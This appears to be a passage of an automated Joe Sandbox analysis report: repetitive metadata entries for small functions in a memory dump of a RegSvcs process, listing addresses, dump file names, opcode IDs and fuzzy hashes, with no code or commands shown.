                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                              • Instruction ID: 3a645d05db048e5a2937cf36c3d58d647fc753ae06e93f94360992995f7f05c0
                                                                                                              • Opcode Fuzzy Hash: e361fdd744b37e572f0fb281d5ba342fdf237642d1eded7d2c73f776bcbc3673
                                                                                                              • Instruction Fuzzy Hash: 2AB012B1504640C7F304F704D905B16B212FBD0F00F408938A14F86591D73DAD2CC78B
                                                                                                              Function 00960060 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                              • Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
                                                                                                              • Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
                                                                                                              • Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E
                                                                                                              Function 009601D4 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                              • Instruction ID: 018f436d7687ff9142db90ebed9d2f0c0dfd000868ccafab48d689f3c6447ef1
                                                                                                              • Opcode Fuzzy Hash: 8778145c82cc07ced6a03fc17a8dcea4f431f55768a4b0417211ed07bf4591cb
                                                                                                              • Instruction Fuzzy Hash: B2B01272100940C7E359A714ED46B4B7210FB80F01F00C93BA01B81851DB38AA3CDD96
                                                                                                              Function 0096010C Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                              • Instruction ID: 6f78205b53d22ab4e8c81d7e3ead40d6172b524c4c965a7ad5e52c730ffb8076
                                                                                                              • Opcode Fuzzy Hash: ee2127f5049c20af2db79b3523ae30c516210f3a5483c1737df9ea5d0a06ca55
                                                                                                              • Instruction Fuzzy Hash: B8B01273104D40C7E3099714DD16F4FB310FB90F02F00893EA00B81850DA38A92CC846
                                                                                                              Function 00960C40 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                              • Instruction ID: df3521920546c87a7cfa40f03b9d1cb3325e43f750a27356a7d3e25b902d3ed9
                                                                                                              • Opcode Fuzzy Hash: f629700e8a0faf16c3a99a987d81dda9b9e9a08178d0ad03aaec4005a132e95a
                                                                                                              • Instruction Fuzzy Hash: FAB01272201540C7F349A714D946F5BB210FB90F04F008A3AE04782850DA38992CC547
                                                                                                              Function 009610D0 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                              • Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
                                                                                                              • Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
                                                                                                              • Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446
                                                                                                              Function 00961148 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                              • Instruction ID: 165250f8074bc0ef9cdc504fa449021ea13c8322197c03fc884fef66fc1cad38
                                                                                                              • Opcode Fuzzy Hash: a1a4eb0b16b3dbbf7110758f456c9aa6f179838dd1f90225a28a8369ad29a59d
                                                                                                              • Instruction Fuzzy Hash: 23B01272140580C7E31D9718D906B5B7610FB80F00F008D3AA04781CA1DBB89A2CE44A
                                                                                                              Function 0095F8CC Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                              • Instruction ID: b608c8617bc096b37df9be2f0bc93e64f466faa20b7dbfb3ee59c54b4bfc8c85
                                                                                                              • Opcode Fuzzy Hash: 33242f20aaab27225aff268df6c25d5fe4c2b5540d13ace685107ef1cdf40795
                                                                                                              • Instruction Fuzzy Hash: EBB01275100540C7F304D704D905F4AB311FBD0F04F40893AE40786591D77EAD28C697
                                                                                                              Function 0095F900 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                              • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                                                                              • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                                                                              • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                                                                              Function 00961930 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                              • Instruction ID: 3aeeca65ea1aaf37b62c9893cb2d02334d47a3b29990fed3fb0e6cbc500f1d8d
                                                                                                              • Opcode Fuzzy Hash: 24bb0b37ea7353fce174200a7558970e7d293f02c0796de48d820b1db3e8008e
                                                                                                              • Instruction Fuzzy Hash: 52B01272100940C7E34AA714DE07B8BB210FBD0F01F00893BA04B85D50D638A92CC546
                                                                                                              Function 0095F938 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                              • Instruction ID: d523cc507bde657408e54325c2dcaf12b60df831943b7985b4c6fe4931788f26
                                                                                                              • Opcode Fuzzy Hash: 4f2cab816673a0835cc858cab12777882f58cc76e03a07139f76655cd686d1a0
                                                                                                              • Instruction Fuzzy Hash: FCB0927220194087E2099B04D905B477251EBC0B01F408934A50646590DB399928D947
                                                                                                              Function 0095FAB8 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                              • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                                                                                              • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                                                                                              • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                                                                                              Function 0095FAD0 Relevance: .0, Instructions: 6COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                              • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                                                                              • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                                                                              • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                                                                              Function 0095FA20 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                              • Instruction ID: 9b5f4fb9875c6876c932e4128e9800c708acc4d40f0b969179b44b3e8b2884d0
                                                                                                              • Opcode Fuzzy Hash: dd081996be218738afd9aebd029b97e59d15eb89e01646829fdeee62bde327fa
                                                                                                              • Instruction Fuzzy Hash: 4FB01272100580C7E30D9714D90AB4B7210FB80F00F00CD3AA00781861DB78DA2CD45A
                                                                                                              Function 0095FA50 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                              • Instruction ID: 2cae8b11bd858d750de1a79d340ce6dfe3ec44f87311ce0e8d0be64a47f0ebf6
                                                                                                              • Opcode Fuzzy Hash: a404d463d6f8697e12459a80a2071a15e1bd5ec6cf7fed7c99dd07a5c51de8f6
                                                                                                              • Instruction Fuzzy Hash: 9BB01272100544C7E349A714DA07B8B7210FB80F00F008D3BA04782851DFB89A2CE986
                                                                                                              Function 0095FBB8 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000AB0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_940000_RegSvcs.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                              • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                                                                              • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                              • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                              Function 0095FBE8 Relevance: .0, Instructions: 6COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.397445363.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00940000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A30000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A40000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A44000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A47000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.397445363.0000000000A50000.00000040.00001000.00020000.00000000.sdmpDownload File
